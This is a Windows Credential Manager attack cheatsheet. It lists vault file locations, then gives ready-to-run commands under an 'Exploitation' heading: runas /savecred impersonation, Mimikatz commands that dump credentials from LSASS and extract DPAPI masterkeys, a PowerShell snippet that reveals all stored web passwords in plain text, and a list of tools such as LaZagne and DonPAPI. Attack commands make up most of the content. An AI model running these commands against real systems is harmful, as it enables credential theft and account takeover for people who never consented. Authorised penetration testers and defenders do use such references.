Windows Credential Manager Cheatsheet

Credential Storage Locations

Path	Scope
`%UserProfile%\AppData\Local\Microsoft\Vault\`	User
`%UserProfile%\AppData\Local\Microsoft\Credentials\`	User
`%UserProfile%\AppData\Roaming\Microsoft\Vault\`	User
`%ProgramData%\Microsoft\Vault\`	System
`%SystemRoot%\System32\config\systemprofile\AppData\Roaming\Microsoft\Vault\`	System

Credential Types

Type	Description
Web Credentials	Websites/online accounts (IE, legacy Edge)
Windows Credentials	Domain users, services, network resources

Enumeration

List Stored Credentials (cmdkey)

cmdkey /list

Output Fields

Field	Description
Target	Resource/account name
Type	`Generic` or `Domain Password`
User	Associated account
Persistence	`Local machine persistence` = survives reboots

Exploitation

Impersonate Stored User (runas)

runas /savecred /user:DOMAIN\username cmd

Export Vaults (GUI)

rundll32 keymgr.dll,KRShowKeyMgr

Mimikatz Commands

Dump Credentials from LSASS

privilege::debug
sekurlsa::credman

List Vault Credentials

vault::list
vault::cred

DPAPI Masterkey Extraction

sekurlsa::dpapi
dpapi::masterkey /in:<masterkey_file> /rpc

Decrypt Credential File

dpapi::cred /in:<credential_file>

PowerShell Enumeration

List Web Credentials

[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$vault = New-Object Windows.Security.Credentials.PasswordVault
$vault.RetrieveAll() | % { $_.RetrievePassword(); $_ }

List Windows Credentials

cmdkey /list

Tool	Purpose
Mimikatz	Credential extraction from memory/DPAPI
SharpDPAPI	C# DPAPI attacks
LaZagne	Multi-platform credential recovery
DonPAPI	Remote DPAPI extraction

Key Files

File	Purpose
`Policy.vpol`	Contains AES keys (protected by DPAPI)
`*.vcrd`	Vault credential files
Master key files	Located in `%AppData%\Microsoft\Protect\<SID>\`

Keyboard shortcuts

notebook